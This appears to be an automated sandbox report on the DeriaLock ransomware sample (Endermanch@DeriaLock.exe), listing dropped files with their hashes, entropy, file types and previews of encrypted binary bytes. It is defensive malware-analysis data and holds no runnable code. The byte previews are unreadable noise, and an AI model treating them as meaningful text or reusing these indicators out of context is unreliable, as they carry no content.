                                                                                                        Preview:.W.f.:..,...[3...l@a....m.k..46..=..^/.[..V.C.}.tH...!G.......+...:.....1..z.jU.b.....`....$..r`..E..3...r.....y!.p......V.<.R".....yX.]}|.B...^.1...A?.y..m._.6....={.U..sl.N..hC}t{..]..R[....2....1rD=?J.=V..C!..............y..H.%.$."...z........;\.Jq}.&Tc.$k..o.0...a.WeINp.....U.....=..F....$.:84.I....Y.A9..I....3\a<.y...U.S....z.$u...Q.Xfs.ow_..M..<......L.u.d..A......f..~..k........@.$@...B.O|k4@...."o..2..F..V..3.?.{..m..!....|6^.....:.@.wI_...&."-........K.(.....;).....m..{W_>.~....L$.R..O".......N^....O>K...._..}.....].....X...R....*....W31{z...U.qoF[.31.i.$@..RsG.=...+.S6..I.%Z.$3.=.%3Q.1..'....I......!I...H....=_2v..$.........R....K.......b..4<z..SA~..1..>..:w9...b(.@.....0+G..q.Hch+./...v.rA.,.UMh..`...h....}.E".........I...+..q.....f...l@..%P.(W..^)......T"..dG&..6.B.r0....l....f.7....X=.<...@.....%.o.}.~,?.........h$....3w..._)?..'...;.F....<..<.W..;L4.M5..C|...*T5.W_.O....8..}..Zd.m...[...F#..Ugh-.f..}..1a.K.e.......
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1040
                                                                                                        Entropy (8bit):7.799949876625159
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:CwheFfnQvnizuFUcR1vNmUhTRjI095yapvtl6o:CwOf6iihR7p9P9MGtlh
                                                                                                        MD5:141348AA3394ED02D044FFAEAE8C7628
                                                                                                        SHA1:ADE00281618333E88B665026EAD68771BF867318
                                                                                                        SHA-256:4E536972CDFCDFE415B3EAA84121942D21E2DCC8EB60549F5784B44FB8907055
                                                                                                        SHA-512:A44E5798D02C32904F32BEC1AB74EBC9A45FCCB78634D98276A992D577F63FC1B4D8870ED23B6A82022EB3C00F4542A1FB4C5B0FF2FBA10C8F64841DDE57F8FE
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:..&...2..U.s.z......i.N.R.n.....i.o..a.Z/.....Q.E^u...4@......O.U9#E{l[.e.5.>1.\6Y..wX...N.a............'.H...)y1O;...H...f.Z...V*ys........RV...P.@...D..8...L3mR.^...okj.xT........?.w.k.e88@....4,..D.....^H1..Th.w..qg.y......L...!CWzn......9h'7...I.c`|(.........3o7..byo..A%".P8...5.F...x.XH......LT..q.h..#........ +%..P...W..y...1(M.Iy.a.;.H.%93S......*od.Rd.2..>...w.*...J.u.z.bf......-g.ZR]...#.*W.V....yL.L...M..E.R.J.dX1.<........Jp.hj. jT.f&.B...z#..`;.....`W.dk0.V..#L@.H...i.. ..6(......L.....Cho...O....IDL."..[C2O..&E..G|..e.*G...?.A...Yvq.1.{S...m..0-?....\.;5N0"+M..(....az.....+rHVR...Q..h....I..G..^..T..@...l.E.......$.....qmI.q.....Hg.7vD[g5<..:l......_\.....pp.1..aS(.2....l.6...!.\.\>.`....T...1.).n....R....r.{..X.-........Zq.....e.......)....W....G.O.T........8.:..G|..eS.....Bp.+6B.#..!.tl..e.L.....'LM.w.w....3&...I..U......o........f2..[..Ul.D*..Z....:.6s:1=).g.....'F...h..h.^....<..5........W..L,..E..Ei..V.;..w.Y. h..yw{...c^g.c.7.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.807680141342843
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:/NOhXfHlXxynUDBg8h/UaMjJ1HRBeP2CMSiEKDSmMhm/Z5N:cXf9xynF8B9MjTDU2CMSMemMuZ5N
                                                                                                        MD5:9FFE53945DA89315B699C477B41E5CCE
                                                                                                        SHA1:BA124CB1DBC1C569B5E9424FB1D6E42C7094F800
                                                                                                        SHA-256:49EE1E7029B02B3B690068EB8AD831032E5D24B3E5E97536985585A37CF160A0
                                                                                                        SHA-512:F5F139302E5F5AC8E0C89176792BD210CB2197BAC14091D554BBC74E6D08646AB5D168A9BF730FE85FF0F4AD45D5C0361CF1447B6A6EAAA9977CDFED3DB397C1
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:D)v.G....&..cc7.C..9.M.<?..-...&J.....i....v]..R.L.%...G..Ew..............~....$..9J...7.p.H.H.e>.....-.Q..S*U.;..6........T.B#.../...J1...K{)=.PH..y.-q.....O....dO.Y39bU.op.tz....<._;...K..r...p..20.G..P6......3....0................u.......<c...E.l.....9Bw:p..q..{at.@...6......I.x.(..>.Sn..[).=..^.{rc.ATvr..+....(2...-.uO.E...o...`-[...H.Y...l...T.C.}.@~n3*u..l.hg.. ..?@..........2.b.........r./.&..S..../N...j.E}.!...../\.r..U.O.,.......=....=.^.^..cI.*.....L.....{....Y....H.dH..9.c,.0.7;.....a...#A....X...`.....jJA[Z?B..L...).+...p.m..}.5.zL.....;.$.p.t.#.]. +..{..Iz....v.._^.Ry4N..9...D.....ia.0m".7.%...~.h...h.._._..)b......~..[y.{..1...Yxo...s.j!...w...[.r.Y..)..........5.Nd.LB.K...../1.....P..f.@.%.4.Vu...g.........x~....b....._.....K%r..K.9.2+........ ....Z@..l.....4..<-..&.y..v-.D...*..,PO.y..q..si;E.c...Y.~.....`4T...V.b..B...9X{.....|......2...>.@{4.`}....S..[....`.y...#..Xn...h....`Wl%"'......:.......1:.S.x&`.....\.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):416
                                                                                                        Entropy (8bit):7.507484107545686
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:y7BRaUG0xaCgour7OKpEBdTRAsimV+6NJ+CtWaWk3U8YZScPOHNkx+n2xVncGg1X:AuiMrMhhtXJxWaWk3UNZSWkfgVn7cdJ
                                                                                                        MD5:56544FF9A9A659E62E4FBACD214606F5
                                                                                                        SHA1:CB2ED2140679A640E1AF0C81732A83CEB78F9BE7
                                                                                                        SHA-256:4E80BF07432C5E6C9D9FF2112B6DD8D5705C4261B724F930F6D39A0692875D4D
                                                                                                        SHA-512:F58960722EE499FE8CE5E6D67D12B21E79D63C632C08A83B742836DA9E832EA5D81DFC5BA06A4489E29B5AA83F57C1DF14699AEAF92DF74E6FE57C25E1C03B67
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@."a.d...M^.'.5.n_.*......0....$;.^. ..1..g._h...T.'...2..."..FA.B >*.....G......<m|.Zx.q.ya...D...J...J$......uD.....9.....kq.).....#...v4.8.I.w.........n.^....v..Je........).u.kz.0.q.....>...K.7.}n.i..SKt....E....;9.Hir..N.,o.qZ.u..E.?l
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.83286502370842
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:JMhq34lkMFF9bFrySg+ClzrN+s5cEaKNbCI64wkSjrG0JYuo:JMhqoGMzz2Sg+C98sZ2IxtS/G0W
                                                                                                        MD5:A850A2AC93573274BD1403987B8825E1
                                                                                                        SHA1:E1E587E459483A0E1E9CEA058558821A44E5EC86
                                                                                                        SHA-256:E039C018FB68EDF6B7959F3D5218E4504704C47641112661E49C9660E42BFA04
                                                                                                        SHA-512:6705E939E9E8FC771FB052B62FFF6EA1A432386034DDC2E0DA2E1E963023758A91C72F89B19690C0F1200DD36DB2E54D34840DF9D7CBF60E50FAC4D7156F9E10
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:.O.."j..n....5.}X.N...z;...@Vo..R...pQ.3.H.....a.^~...u.K....H....U....]W/+[f*q'.e.<P,...#...g..B.Z:,.#.N.4.$../...b.%..HA.J_.IA..Ny.8J.`....T.[_.....N.F..P.6D.K.C.B....P...w&...y.z...A.....;{.Z..)....\T..#..t..[...%gz....p[...;..=.t.bD...o...E.N.eG>...G..t......!..O.)..({.|..3.......`'P..].|W...A".z*...2.....3jk0....#...cW0EY`. ..5K.$5!)..3`<.....$.h.W....0R5M.'R.\.....Kb...u..F.s....Z#\....D....!........$N....l.].5w.F.H..G...$3.y...%.9.......Ba~..b*.s...4`.@5.?.hZ8e..F...5i.S...i...}..K...<....t+.3..0c.y..L.?n...h].#s..S.j..K.4...(..9f....2.]......M.KW.X....A..M......c.......g3\.X.... cH.~......a6E!a.H4x.=...`/...0{.5...t........C..!..Wcx....%Dt.5B.b?.}........x."..oc>My.QZ+.*k....W.....j=..1.......9.6*.....9.E"...._..a2%P...4@1.Y.pY..]..SK.#i....r.u..(....BC..d}.ev..h.C....(ma:.N.o)..{e(.....W.....e?../....@,-.[....5..J..p..d...../=.i k.m....`.\.d.Y.Q.j.y..'+$.C]SG.h.i[...~.PV%...8.|.Z...?..gu..e.k..^gb.......n.o.....I..{f..6..o.{}.}.Q..m.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:OpenPGP Public Key
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1040
                                                                                                        Entropy (8bit):7.831654941302444
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:09cOOTgp7+Ojw98+mwBNN1TipCq16CIu9jds3P:Ic3cpaOX+mwBf1epCi6gdK
                                                                                                        MD5:C815FB424E89CE749A06CE094B47C918
                                                                                                        SHA1:6AC5A6C76BCB0B24E652CF2E9CFD913D92DE8E3B
                                                                                                        SHA-256:18FED3FEB59705648EE39D6CE464C7C7360BA242E375628B5D7339C8425AACE1
                                                                                                        SHA-512:A186F636E7587EF6D25F35B50848EB94ED10F17281D16988FB4AFE52CE16ABC7C413ECEAD7EB39CEE6EE353FF69EAEB50C15D0D847FF937DECCD0448096B838A
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:..l.._...3)... ..M.......q..'.y)..]s}.........C.;O...o.4..Hn..V....&......8...8p.K9o.Mp...,..T...w`>.....YAUu...bW.S.a.)y?..).4.6../L...3...U.].....p..*..}..........q<e.Y=..T..h.4>..L.>....oG.qmu.4.H..t..C..Kh.....j..75.vO&..N..!..,_..>J.....}.a.% .&..1U.E":....H__,.A.C?.Dl....}w.........m..q-....N.a..E.P.<...+..I;S.g\....N=D..>...WB..DcC.5'....+D....e....U0F..........;y.95}......aN...|....W...k..E]|..ISl..N..Q.2..s...m*r.c.L..X.S.w..Y.V... ..|..:...e..-..&..}...4.!AX5...`..J.c7...g..5}.n..x.W..C..ka...8...$m......t.(!..$.H.?.Wi...w..(..M\...sl.....`q..z[.:`W.>9........s*..o..[......P..".AP.".....j@......:.ur.o.z.)i.z.{..c..Zm..7-.h.s...t...W..x....B-..t..-3....E.....V...'s+#..D..3..N.k31a...c.z.`.t..a..)^I.O..~..z..9^.G.~........qZ-r..S+~/.*.?H....wX.^z..q.^.Z.7.....WAq..=....h.,a.....S2..=.dRsKpm..)D.@.F.Qd.K.F._.[l.....;....lb@..g.0..\)AKV...2...O.4]../.1..5......Jo..-..YTC.S.8.pd#Q...\^..Pl...W..R.`..|.....m.FHB.:....]_..<...]y...F.....
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.848926243504784
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:nbtVaPerMaGHE/VQiU5NuQ64q3knrpumTft+g687u7ijvIo5A5h39pH:btV7r4HE/nU5NXF8Mr3zc8YijvIo5INl
                                                                                                        MD5:D0DAA5507930221B86FE66A01A803536
                                                                                                        SHA1:FA0E34049BF2E59FD59968869E14F81B34794C8E
                                                                                                        SHA-256:CACA4CF9D6F8452C89A7E902F6CE52E5BE2D46B8C6360044368782ECAF77A3C9
                                                                                                        SHA-512:F50FC906808D9D079DF8B5D0FA398EF4C9813ADA2047711B5D893086CAFC0759B60CC56D31CC0B8EEA5F994DC7BE4B8F4DCEA4CBD6D580C8AEFC4BFD607CFA06
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:..k..]3.^.....x...s..........yh....~...GF..."...g9.gK.....c..m.qv...v........$....?.h.z.%.=.4E..S.!N........?....5..././..BN..n.D.\.2..0....4%(Br.>M..NXilf.uOe........d..#t..~.qq..v..e./..D..Z5.k...Xj..D.......Fv.......a.z{.;..c.^.3.V.7O.X$.T...#..........t.....v($@..D..|].h.T...A7....q.SXa.Zj..a1c.}...w..'<.....W.P1..B.lEE.^...8..Ge..P..m......p'.l..54n.]&.o.....QH..5C.F."R..<.(......M#y.8sg..U....[....@......$...R..Y.-M...k....O....J2...<..Ov'.....P.z..-... .....#.1..9....Pb!P........2&.zY>........^M..K<.J.c...5..6.FY.-.......)......U......y...$\...h...Nba;...q..U........d.S..%.....2.o..o*..q.+.Z.Q.s/!.A....}z..=k.dS@.H.........O.?).5..............C..Jx.b.._m.&T.8.....`|...KYj..a_.x.H.T.'.....'....X_.#.,.....~x.b2.b..q8w........nI.~.+..X.z .>.=....;.V0JPp{......P^..r .$e+.........J;.....e"...%..+......C.....L\.L.2(..~*.....z..O...W*..g.]?`..y..|.4E..#....k<..T......]E,<n.a.|..S..{..,&h...Y..gz...c....j........=.r.L."
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.828027720274939
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:/7H8P5u8B10X+Ox7K5bglvwH1n0l5AVtJQUz2mNmnYuMI86Sjp8Dpq1:DcRbSx7K5B0l5AfJQNnDMzjp8Nq1
                                                                                                        MD5:6E847EED6C7CD3301808F86B197A10B1
                                                                                                        SHA1:B948D7CDE4D88FB3B2289BD3FA4889D07CE95D35
                                                                                                        SHA-256:963AA7AA362A9D6C4D31C64C6768A1B835430D54B82E22ED01DA1B450B444BF5
                                                                                                        SHA-512:618717E4C292FAFD5E64D2C0156D7131EA7BCD91F37F10972C9552F64B8EBF47406723078533D71E69E719DDB9BD227F973AA519FFC5F7E67A45F8C0A9B5E22B
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:..H....U".....z.ey.N.Tuj.Asv..f...|.Z.X^.".B.QW.`.B{~...#(...F.*.n..h.6......F......(.$.U....q._.r...h-.Q-L..!.....}.:....a}..n.Wz.....[J.4.yP..\..g..`.{g.'.E.......9BqF....)..N......$|..gR..L..V...?...[..b..X..da\.N...^.(a~+4...3*y.5.I........H.Qf.0.........K.......N....g..u..psL.9..c4!.......N.<......|h..J$.Y..&.Tt-..X...\.L!E.C.3.0g..j..c..U......~HA..|...........3..F..?$...N...I"...qw.^,..Jo......Bm.p..L.....vd../..>.....&9..7F8w......+.v......n......A.>8..\.L...T .........T....:..c..Iy.C....t.=...'.....5.....X.K............_...e...Z...e...&@......3-.m.2`.j..c.{k..A#u.3.t....=.22&9...G...\..&.....g..At..v..(`.6O.Lj...fT..%Z1.Ta.@....5.m..E..N..1.Z9..#..QgA..>....O...*C.ns9...l..2....lqfG.Y.k@..._6-..8GP...z..3.....Lot,..X......KKz.<..$i....m.....J..r...+Q.C.....!].I)..vB..j|...\..d.=...hp.D.tY.z.9...p.,.0...7.|b.......`...c..............>h.@.-..h..x.....v..~].(.B....a.Y..u.n..../.?e..>.|,[I;...SQ....@2.Np.....{..2.....
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.807351928385191
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GzNoLJ4ZP/itIqc2eNNsk6JswzSkVko0QWuWtKLikzdi1kZWR:GzNoLJuPKej2efsk0sISDfuWtk5im0R
                                                                                                        MD5:6757CAD0E85A3CB89C275519A9388508
                                                                                                        SHA1:8A26F09B2BEA9859E11454EC1AC6A47F0928FB91
                                                                                                        SHA-256:57496AC06F65FEA4115FFC813C29D0475D0A62DA4E55DAFABFA113E0EE1B435D
                                                                                                        SHA-512:60F00D51283912E066A9F0DFEFB43EFEBC37C92EC25ECAA6E1CE96B185B359949CBE5A1FF2DC646D17F3EBEA04D95FC5EACA26969911CEB9B893BDF2CE9B636B
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:.....9...w.5..........kR.v....L6...m..J......SS#Z.Z....b.o....sr..M..!.*.;.rL..U5.p..b.Q..)...G....I..7{B...`D.l......~....E[GP./...W.X.i4"..Yw.I.}..+....M6V..g^.....H.E8..I)*...z9r..L..avX..O...6..}yT..X}.gO<...e....W..]..R..\.T..;..K..#..L......[.V...as.......w.b\.F..,.O...oj6..@>....EUcp....!.O..z7Y..~Z.jL..U....W86Z...M?r..6...4[.,....dB..]l..2i......v........v...mg\d9..u8..rrwN..i..p..../.8..l.D..W.[..+H..y.~y/....B.>o$..g..Z;T..O./.....Ux.B>.$..{...^..x]E]..Fe;.WZA..h..7j....[....I.~)L..u...{B...7..*..."....-J.y..._.A..B../et......L..k6.~..Y..bBJ..=...>.D..o7.c3.R..4;. R&....a........|.$`c...Y..Dn..o...T.....Y>.B}_.X_.I..tX.^.G...^Z.T.YVx....EzR.|.s.....}.B.....8x.....3A;..O...ao.]..9V..U....cj|.z9.4E.Tb..w..C...@:..}.r../hL...(.\B~..4JXL..}..9^..H.u.b..,...yX.!..T.#q......_.0dil...\.BPA ...Nb...M$.rQP.....R8..._.St..j..RyKB.....8..q{..p..8.nB&.....o.....e..sf... .b..k.N.A.lS.......m.6E......I..G)I.....:..G8...a.5.......}.....h.h.....S...
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:DOS executable (COM, 0x8C-variant)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.836334165377041
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GBx2yozxAbUmYQOAR+qN1DC+lfwpNy8oVOJZkq9f:mxLozGh+8DP8owJ+qJ
                                                                                                        MD5:25C82A71D6A1ADB00DFDFE851052DCA3
                                                                                                        SHA1:89E2AE8CEB8DBD05F6194A82EAA69AB1D96426F4
                                                                                                        SHA-256:D403FCEF9F337C454D15781E554E44F9231900EA500C634077742B02B85AB733
                                                                                                        SHA-512:D1A412214342203FF277575380BB86BEA688C54D15D01B8E9472F9B593EA8D5A16436DD6898385EB0268CD90BD82D3C51ADD634B9027BCE0FEE695B4EDB82520
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:....Y*....I.9..U$.0g.-.<..E.*^(..d.?..*........tJi.?.vJ@.]...T.@.q.1qC.....z.A>..e..&..zh.9G.5H@...9...{....bfR~.2K..K...T.[n.$.....&.I.%..m......1....4.M..?.b.G.[...y.6..;.....tyR{5.V.:^..W~....yP./...u^....J....AM-}.)..u.].....u.~.[.h4....o(f.o>.!.....K........J7..\.,..#....*i....W*T....UN....."M.._....!R.P.......`5=r.4.H..K...7..n......g.I..m[.9+?..A,5.].~W .Z.[...E...6$....j_..u{v.=........_.E.5n..9..\>..^...5.g$....k......Z...Ud.9....%'...M.....O....,...U..8....L..;..z.%@..y._q)M...k.....1.D....`.-.\..Ro......PF..].5R.h.q....i=0..r8.d..K.d5Z..-....R1....l.llU.Z...#...o..5..........3.oE..S....}.I..!Ql.s17.ytqUF`.#[b.....'...i#.o...u$.8.%J'...W.....|j.uP:..T....<.p|...G.'.9...%;.....y...@L..2.s.....HO..W.N...y..*1.y.6..R.q-..k....D`.....7......-2...#..x.K...2..UoHu ....+...!.y..'n..i.iF..z.G.s.n.6 C....M.U...b...~...s..9...H.W#..6.%_....,Q$.\.Ni.F..e!l.-A.=..7.k~.R.EzY......u.{..D.|h;..c......EQ...v...x...c.>zU...7...w..S.Y_.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:DOS executable (COM, 0x8C-variant)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.836334165377041
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GBx2yozxAbUmYQOAR+qN1DC+lfwpNy8oVOJZkq9f:mxLozGh+8DP8owJ+qJ
                                                                                                        MD5:25C82A71D6A1ADB00DFDFE851052DCA3
                                                                                                        SHA1:89E2AE8CEB8DBD05F6194A82EAA69AB1D96426F4
                                                                                                        SHA-256:D403FCEF9F337C454D15781E554E44F9231900EA500C634077742B02B85AB733
                                                                                                        SHA-512:D1A412214342203FF277575380BB86BEA688C54D15D01B8E9472F9B593EA8D5A16436DD6898385EB0268CD90BD82D3C51ADD634B9027BCE0FEE695B4EDB82520
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:....Y*....I.9..U$.0g.-.<..E.*^(..d.?..*........tJi.?.vJ@.]...T.@.q.1qC.....z.A>..e..&..zh.9G.5H@...9...{....bfR~.2K..K...T.[n.$.....&.I.%..m......1....4.M..?.b.G.[...y.6..;.....tyR{5.V.:^..W~....yP./...u^....J....AM-}.)..u.].....u.~.[.h4....o(f.o>.!.....K........J7..\.,..#....*i....W*T....UN....."M.._....!R.P.......`5=r.4.H..K...7..n......g.I..m[.9+?..A,5.].~W .Z.[...E...6$....j_..u{v.=........_.E.5n..9..\>..^...5.g$....k......Z...Ud.9....%'...M.....O....,...U..8....L..;..z.%@..y._q)M...k.....1.D....`.-.\..Ro......PF..].5R.h.q....i=0..r8.d..K.d5Z..-....R1....l.llU.Z...#...o..5..........3.oE..S....}.I..!Ql.s17.ytqUF`.#[b.....'...i#.o...u$.8.%J'...W.....|j.uP:..T....<.p|...G.'.9...%;.....y...@L..2.s.....HO..W.N...y..*1.y.6..R.q-..k....D`.....7......-2...#..x.K...2..UoHu ....+...!.y..'n..i.iF..z.G.s.n.6 C....M.U...b...~...s..9...H.W#..6.%_....,Q$.\.Ni.F..e!l.-A.=..7.k~.R.EzY......u.{..D.|h;..c......EQ...v...x...c.>zU...7...w..S.Y_.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.773908532302792
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:gwau5l/i9JYUXB2twzp7N/g7EAshi+yLoRnoMkz:9aYiXYUxKoP/hCFL
                                                                                                        MD5:813A7D25DC89338D29BF4BB583A4F17E
                                                                                                        SHA1:9FFBC5C65114277169B7381AD35430FBFCC9C663
                                                                                                        SHA-256:0B42D2B6FCDF82602F21450740C83A64365B2C36A733C67B51AB08BFA5C4DC93
                                                                                                        SHA-512:13198E8CA13E67C36CABC4E1497F4900FD9F46A9F264AEB089F3EA7D1CD21F14511453ED73CA0F6936812890B0318F2F80429D94E80421E4E2BC7BEF558AF48A
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:.....)..*ghKL4.2..s..4I...%.N.8.......MV.|...8...v........Uy$.=..hV..j........!N.'(...m...../.....|.:....*%.."^8.....s../...4.....6......R.ZR#h..$0i...P.OPa.@..[..#......tl.|K$...*...\.M..</py-...!.Y1TV8.^..U.....9.@ ....|D...\hz.v..t..!._...B..Au.Q..=s..35 .-..a.b..;.....`....<.=.Ye;.|R.....6........(t,..}..?7Q5..J.e.hmr.S....K......M..g.k%.g..}.Ze.r?l..,...l.U~..?.....;.od.J..u..yw1.....s...{[.-...+w\X.........iA:.s..*..YQ..[...r.x.I......e-....t{.=\..........[.ej....K.es+....:2?...<.K.1..Z.....T...*?./[.YP...u3..5......t.....?....Xu...u.e.kn.hY...{.P8.;4..Y......h.l5.OB.......y...i!..7....jC...B.~fY.D.k?yO...E...7.j3..a.x.......x%..&..@3..Y..._{.W....V...t.I.4..6.Y.kqn`....*Y].69...q...,....*......x....a{..Y)..9.....1x.:i.4p.(!P.?......}.kNa.....`'..^..N..7..@.-(..U.'.+.j0._;`R...N.xC........R..).J...!.*..v.......C...S+W} ...e..VA..j}..;YF......v..k.6r"..^....HN..a..]gvV...{...th.s..|..zBT....|....@.3F.7:..*/....S....JKsY..8y......?.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.773908532302792
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:gwau5l/i9JYUXB2twzp7N/g7EAshi+yLoRnoMkz:9aYiXYUxKoP/hCFL
                                                                                                        MD5:813A7D25DC89338D29BF4BB583A4F17E
                                                                                                        SHA1:9FFBC5C65114277169B7381AD35430FBFCC9C663
                                                                                                        SHA-256:0B42D2B6FCDF82602F21450740C83A64365B2C36A733C67B51AB08BFA5C4DC93
                                                                                                        SHA-512:13198E8CA13E67C36CABC4E1497F4900FD9F46A9F264AEB089F3EA7D1CD21F14511453ED73CA0F6936812890B0318F2F80429D94E80421E4E2BC7BEF558AF48A
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:.....)..*ghKL4.2..s..4I...%.N.8.......MV.|...8...v........Uy$.=..hV..j........!N.'(...m...../.....|.:....*%.."^8.....s../...4.....6......R.ZR#h..$0i...P.OPa.@..[..#......tl.|K$...*...\.M..</py-...!.Y1TV8.^..U.....9.@ ....|D...\hz.v..t..!._...B..Au.Q..=s..35 .-..a.b..;.....`....<.=.Ye;.|R.....6........(t,..}..?7Q5..J.e.hmr.S....K......M..g.k%.g..}.Ze.r?l..,...l.U~..?.....;.od.J..u..yw1.....s...{[.-...+w\X.........iA:.s..*..YQ..[...r.x.I......e-....t{.=\..........[.ej....K.es+....:2?...<.K.1..Z.....T...*?./[.YP...u3..5......t.....?....Xu...u.e.kn.hY...{.P8.;4..Y......h.l5.OB.......y...i!..7....jC...B.~fY.D.k?yO...E...7.j3..a.x.......x%..&..@3..Y..._{.W....V...t.I.4..6.Y.kqn`....*Y].69...q...,....*......x....a{..Y)..9.....1x.:i.4p.(!P.?......}.kNa.....`'..^..N..7..@.-(..U.'.+.j0._;`R...N.xC........R..).J...!.*..v.......C...S+W} ...e..VA..j}..;YF......v..k.6r"..^....HN..a..]gvV...{...th.s..|..zBT....|....@.3F.7:..*/....S....JKsY..8y......?.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.829106081952643
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:wInJex1RDwvJRipKGQho64EUaXkdU0xd8+QXTJ+Jbu1xK2ru:zJexAxRaQL4EUa0Nd+DJQbqs2ru
                                                                                                        MD5:C17C953278C03BC0EDD928CBE52DCDA0
                                                                                                        SHA1:2F26CA29F47FF52225348FEE98451843F77FC1B8
                                                                                                        SHA-256:40557267FF7027BB996D0D3C45739E230D4447E49DFF28C9B0CB41A8B738E9E2
                                                                                                        SHA-512:81FCDA22AFC50F03ECDAF7FC7340775D463EAD822A5F3947EA08C5914B8312DA715C71BACF83498303796D3096AAEB25AA4187E0432B0BFC130DBD87CF7A7E9D
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:..h.=e... ......wR....:..v...L.....M..z.-..l.".Y..&.H.7....E....fk........r..tZg....~.2..,.V....Z.c..Qb.:......v.8m..4.$.=..Fb/..CE...<.s;&U..f...YE.5..a=?Y...>j..t......V.8.0.%.Ep........p7z..;...`..5.I5/..O.j.........]@C~.J..<.;d...G.P+D....P....&...{.#...=[.z.......A..8....:...OAY8.....d4J.p.7."...l.w...B..ZJ.....~..+%..P.5r....a.F.*.....{Kk.L^%K.....km...Eu......5.:3..7g...'.,F^*b.$xhVM...M.,./.y...m .8.t.?.....|...h~"..j,.s ......C..\..>..n..u....../K.....E.3.n._..n..x.`M....2'.....p..$]FJMR^.l.....m.....~....!.fF..+$.@...M..q.....q..> @I...Ev.mc....]QS..u..RCt.I.(..9]..#...RA..y.Y.|8GJ..o..F0u..m.....FR.I........AH.O.......f..7L'.I..F..c......V..[kQ.`;K<...{@.BX.t.....6U......X...#...rhDd.{4JI.....OO....<...`.....O...X.0...4...^90....).G!..qf.g..mu2e6..1.j......~..q...,.~#..xJ^2....%..}S.6Eq]..T...A...V.>.ts...........6#f.O.).|P.Gb....nQ..1rm.v.....3;......).C...x...V.W4,.s.H..)p.D.uv...UA......w..s9...7n..r@......jX...;..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1040
                                                                                                        Entropy (8bit):7.82364503797505
